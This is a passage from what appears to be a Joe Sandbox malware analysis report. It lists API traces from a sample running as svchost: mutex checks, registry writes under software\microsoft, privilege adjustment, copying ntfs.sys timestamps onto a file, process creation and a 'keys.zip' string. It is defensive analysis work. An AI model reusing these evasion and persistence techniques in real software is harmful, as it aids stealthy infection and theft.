                                                                                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 02CB3336
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: HandleMutexSleep$BackslashCloseInformationOpenPathRelease
                                                                                                                                                                                                              • String ID: A23C4505$Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}$RFK
                                                                                                                                                                                                              • API String ID: 4280258085-1619370212
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • OpenMutexA.KERNEL32(00100000,00000000,Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}), ref: 02CAB91C
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 02CAB925
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 02CAB939
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02CAB94B
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(a23c41af), ref: 02CAB956
                                                                                                                                                                                                              • Sleep.KERNEL32(00009C40,a23c41af,ALPHA), ref: 02CAB970
                                                                                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 02CAB976
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: HandleMutexSleep$BackslashCloseInformationOpenPathRelease
                                                                                                                                                                                                              • String ID: ALPHA$Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}$a23c41af
                                                                                                                                                                                                              • API String ID: 4280258085-2804296356
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}), ref: 02CAFEAC
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 02CAFEB5
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 02CAFEC9
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02CAFEDB
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(a23c4015), ref: 02CAFEE6
                                                                                                                                                                                                              • Sleep.KERNEL32(00009C40,a23c4015,HANDY), ref: 02CAFF00
                                                                                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 02CAFF06
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: HandleMutexSleep$BackslashCloseInformationOpenPathRelease
                                                                                                                                                                                                              • String ID: HANDY$Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}$a23c4015
                                                                                                                                                                                                              • API String ID: 4280258085-448726435
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}), ref: 02CACBAC
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 02CACBB9
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 02CACBCD
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02CACBDF
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02CACBEE
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(A23C41FB), ref: 02CACBF5
                                                                                                                                                                                                              • Sleep.KERNEL32(00009C40,A23C41FB,BSS), ref: 02CACC0F
                                                                                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 02CACC15
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: HandleMutexSleep$BackslashCloseInformationObjectOpenPathReleaseSingleWait
                                                                                                                                                                                                              • String ID: A23C41FB$BSS$Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}
                                                                                                                                                                                                              • API String ID: 3206501308-2766367083
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SetThreadDesktop.USER32(?,74DF3050,74DF30D0,74DF3080), ref: 02C991F0
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02C99204
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02C9920F
                                                                                                                                                                                                              • UnmapViewOfFile.KERNEL32(00000000,?,00000006,00000000), ref: 02C99237
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C99254
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02C99265
                                                                                                                                                                                                              • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,?,02CDF54C), ref: 02C99285
                                                                                                                                                                                                              • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000), ref: 02C9929C
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 02C992DC
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000,0000007E,?,00000000,?,00000006,00000001,00000000,00000000), ref: 02C99324
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000,?,00000000,?,00000006,00000001,00000000,00000000), ref: 02C9932D
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$HandleMutexObjectReleaseSingleViewWait$CloseCreateDesktopFreeHeapInformationMappingThreadUnmap
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2125184990-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 02CA01F4
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?,?,?,?), ref: 02CA020C
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 02CA020F
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 02CA021C
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02CA021F
                                                                                                                                                                                                              • InternetQueryOptionA.WININET(?,00000022,00000000,-02CDFAE4), ref: 02CA023C
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000014), ref: 02CA0259
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 02CA0260
                                                                                                                                                                                                              • memset.MSVCRT ref: 02CA0270
                                                                                                                                                                                                              • memset.MSVCRT ref: 02CA02B5
                                                                                                                                                                                                              • memcpy.MSVCRT ref: 02CA02C9
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Processmemset$AllocFreeInternetOptionQueryValidatememcpy
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3911349929-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 02CA0071
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?,00000000,00000000,?), ref: 02CA008C
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 02CA008F
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 02CA009C
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02CA009F
                                                                                                                                                                                                              • InternetQueryOptionA.WININET(?,00000022,00000000,?), ref: 02CA00BC
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000014), ref: 02CA00D9
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 02CA00E0
                                                                                                                                                                                                              • memset.MSVCRT ref: 02CA00F0
                                                                                                                                                                                                              • memset.MSVCRT ref: 02CA0109
                                                                                                                                                                                                              • memcpy.MSVCRT ref: 02CA011C
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Processmemset$AllocFreeInternetOptionQueryValidatememcpy
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3911349929-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?,-059BF5C8,00000000,00000000,?,?,?,?), ref: 02C9F404
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 02C9F40B
                                                                                                                                                                                                              • memset.MSVCRT ref: 02C9F41B
                                                                                                                                                                                                              • memcpy.MSVCRT ref: 02C9F426
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(?,00000000,00000000,?,?,02CD56DC,?,02CD5E1C,-059BF5C8,00000000,00000000,?), ref: 02C9F4EE
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 02C9F4F5
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(?,00000000), ref: 02C9F501
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02C9F508
                                                                                                                                                                                                              • memcpy.MSVCRT ref: 02C9F52E
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,-059BF5C8,00000000,00000000,?,?,?,?), ref: 02C9F55A
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 02C9F55D
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C9F56A
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02C9F56D
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Process$FreeValidatememcpy$Allocmemset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1948005343-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 02C97B33
                                                                                                                                                                                                              • memset.MSVCRT ref: 02C97B4B
                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(00000001,software\microsoft,00000000,00000101,?,?,?,?,?,?,74DEF380), ref: 02C97B6C
                                                                                                                                                                                                              • RegQueryValueExA.ADVAPI32(?,00000104,00000000,00000001,?,00000104,?,?,?,?,?,74DEF380), ref: 02C97B92
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,74DEF380), ref: 02C97C1D
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,74DEF380), ref: 02C97C24
                                                                                                                                                                                                              • memset.MSVCRT ref: 02C97C33
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,?,?,?,74DEF380), ref: 02C97C63
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: memset$Heap$AllocCloseOpenProcessQueryValue
                                                                                                                                                                                                              • String ID: software\microsoft
                                                                                                                                                                                                              • API String ID: 4158279268-3673152959
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • strstr.MSVCRT ref: 02CA4902
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 02CA491A
                                                                                                                                                                                                              • memset.MSVCRT ref: 02CA4941
                                                                                                                                                                                                              • lstrcpynA.KERNEL32(00000000,-0000000B,00000104), ref: 02CA496F
                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(-0A6461A1,software\microsoft,00000000,00000102,00000000), ref: 02CA49CE
                                                                                                                                                                                                              • RegSetValueExA.ADVAPI32(00000000,00000000,00000000,00000001,00000000,00000001), ref: 02CA49FE
                                                                                                                                                                                                              • RegFlushKey.ADVAPI32(00000000), ref: 02CA4A0C
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 02CA4A1A
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AdminCloseFlushOpenUserValuelstrcpynmemsetstrstr
                                                                                                                                                                                                              • String ID: software\microsoft
                                                                                                                                                                                                              • API String ID: 1783443066-3673152959
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 004014C8
                                                                                                                                                                                                              • memset.MSVCRT ref: 004014EE
                                                                                                                                                                                                              • lstrcpynA.KERNEL32(?,00402CFF,00000104,?,?,?,00000000,00000000,00000000), ref: 00401506
                                                                                                                                                                                                              • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000,00000000), ref: 00401529
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(?,00402CFF,?,?,?,00000000,00000000,00000000), ref: 0040154A
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 00401557
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(?,00402CFF,?,?,?,00000000,00000000,00000000), ref: 0040156E
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 0040157B
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2972647321.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2972647321.000000000045E000.00000040.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Handle$CloseInformationmemset$CreateProcesslstrcpyn
                                                                                                                                                                                                              • String ID: D
                                                                                                                                                                                                              • API String ID: 2248944234-2746444292
                                                                                                                                                                                                              • Opcode ID: ce458dfe1c04613ef12f54a39762905d76d3e86305e9e66b4aeea111f9933b52
                                                                                                                                                                                                              • Instruction ID: 14e7369bd1a15e27c4b274561f890c179ee839510f861d06d6d7e351d84cbd4c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ce458dfe1c04613ef12f54a39762905d76d3e86305e9e66b4aeea111f9933b52
                                                                                                                                                                                                              • Instruction Fuzzy Hash: BF2167B290020C6FDB10DFE8DD84ADF7BBCAB94355F00457AFA05FA240D6349A458BA4
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SymGetModuleBase.DBGHELP(00000000,?,?,00000004), ref: 02C93969
                                                                                                                                                                                                              • SymGetModuleInfo.DBGHELP(00000000,00000000,0000023C), ref: 02C9397C
                                                                                                                                                                                                              • SymGetSymFromAddr.DBGHELP(00000000,?,?,00000018), ref: 02C93993
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 02C939BD
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 02C939E1
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
• Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Module_snprintf$AddrBaseFromInfo
                                                                                                                                                                                                              • String ID: %s!%s + 0x%04x$%s!0x%08x$unknown!0x%08x
                                                                                                                                                                                                              • API String ID: 844136142-2194319270
                                                                                                                                                                                                              • Opcode ID: 6aa52867f84ecc6b748d5d82d3da6785d36d9147ab3a3a7295d8830c9dc91fbf
                                                                                                                                                                                                              • Instruction ID: c4b07396223532be22c21c5ad937a17e9351cffc7ca0949a9b4de27ab251b16d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6aa52867f84ecc6b748d5d82d3da6785d36d9147ab3a3a7295d8830c9dc91fbf
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7E210772641148AFEB118F48DC88FFE77ACEB84755F448195F909D7141E7709B58CBA0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(A23C4505), ref: 02CB2827
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000,?,?), ref: 02CB2867
                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?), ref: 02CB2871
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 02CB2879
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 02CB288A
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000,?,?), ref: 02CB2891
                                                                                                                                                                                                              • SetCurrentDirectoryA.KERNEL32(?,?,?), ref: 02CB289E
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
• Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: DirectoryErrorLastPath$AdminBackslashCreateCurrentFolderMakeSystemUser
                                                                                                                                                                                                              • String ID: A23C4505$keys.zip
                                                                                                                                                                                                              • API String ID: 4256651433-2360589450
                                                                                                                                                                                                              • Opcode ID: 67c3b66ca71d53715e5cdf06bfa37a94c27152ff23985bc9a7aa00758103c9e8
                                                                                                                                                                                                              • Instruction ID: 354258aaf963efdca4a0032acf1f74bdd87d4ac9f4037520062644beef41c2a9
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 67c3b66ca71d53715e5cdf06bfa37a94c27152ff23985bc9a7aa00758103c9e8
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D6214C759013194BCF129B349858BFB7BE8EF9A341F548A94ED85C7200DB71C654CB91
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateFileA.KERNEL32(\\?\globalroot\systemroot\system32\drivers\ntfs.sys,80000000,00000003,00000000,00000003,00000080,00000000,00000000,00000000,?,?,?,?,?,00402CA7,?), ref: 00401C05
                                                                                                                                                                                                              • GetFileTime.KERNEL32(00000000,?,?,00402CA7,?,?,?,?,?,00402CA7,?,?,?), ref: 00401C1F
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000,?,?,?,?,?,00402CA7,?), ref: 00401C35
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00402CA7,?), ref: 00401C46
                                                                                                                                                                                                              • CreateFileA.KERNEL32(00000000,C0000000,00000003,00000000,00000003,00000080,00000000,?,?,?,?,?,00402CA7,?), ref: 00401C62
                                                                                                                                                                                                              • SetFileTime.KERNEL32(00000000,?,?,00402CA7,?,?,?,?,?,00402CA7,?), ref: 00401C78
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000,?,?,?,?,?,00402CA7,?), ref: 00401C8E
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00402CA7,?), ref: 00401C9F
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • \\?\globalroot\systemroot\system32\drivers\ntfs.sys, xrefs: 00401C00
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2972647321.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2972647321.000000000045E000.00000040.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FileHandle$CloseCreateInformationTime
                                                                                                                                                                                                              • String ID: \\?\globalroot\systemroot\system32\drivers\ntfs.sys
                                                                                                                                                                                                              • API String ID: 1046229350-2760794270
                                                                                                                                                                                                              • Opcode ID: 7c78bbbd609582fa450ae599ee540afb2fc557391311a346b79caf6ae330784a
                                                                                                                                                                                                              • Instruction ID: 0895f171d82555aaaa5436e0262d4f4d844cfaf0768df501368bcb823c663742
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7c78bbbd609582fa450ae599ee540afb2fc557391311a346b79caf6ae330784a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: AE21F9729452187BF7219B50DD09FEF7B6CAF44710F148226FF01B61D0D778964586AC
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GlobalFindAtomA.KERNEL32(Wed Jul 6 06:49:26 20112), ref: 004028D9
                                                                                                                                                                                                              • GlobalAddAtomA.KERNEL32(Wed Jul 6 06:49:26 20112), ref: 004028EA
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 004028F6
                                                                                                                                                                                                              • RtlAdjustPrivilege.NTDLL(00000014,00000001,00000000,?), ref: 00402906
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 0040290C
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2972647321.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2972647321.000000000045E000.00000040.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AdminAtomGlobalUser$AdjustFindPrivilege
                                                                                                                                                                                                              • String ID: Pnv$Wed Jul 6 06:49:26 20112$explorer.exe$winlogon.exe
                                                                                                                                                                                                              • API String ID: 3001685711-2958163460
                                                                                                                                                                                                              • Opcode ID: 83ac0b8a74455aed3f9fe13c08d3b3a7fcb0d139d0bb709980968f6615d0e93a
                                                                                                                                                                                                              • Instruction ID: 2c3c2cb6c74497f887580688acf30243e480456bbc90e7420e586ff1c8abd763
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 83ac0b8a74455aed3f9fe13c08d3b3a7fcb0d139d0bb709980968f6615d0e93a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3FF012B07542196AEA1067A1AE0AB5B3A5CDB84790F404177BF04F61D0DAB99C0185FD
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}), ref: 02CB32DC
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 02CB32E5
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 02CB32F9
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02CB330B
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(A23C4505), ref: 02CB3316
                                                                                                                                                                                                              • Sleep.KERNEL32(00009C40,A23C4505,RFK), ref: 02CB3330
                                                                                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 02CB3336
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
• Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
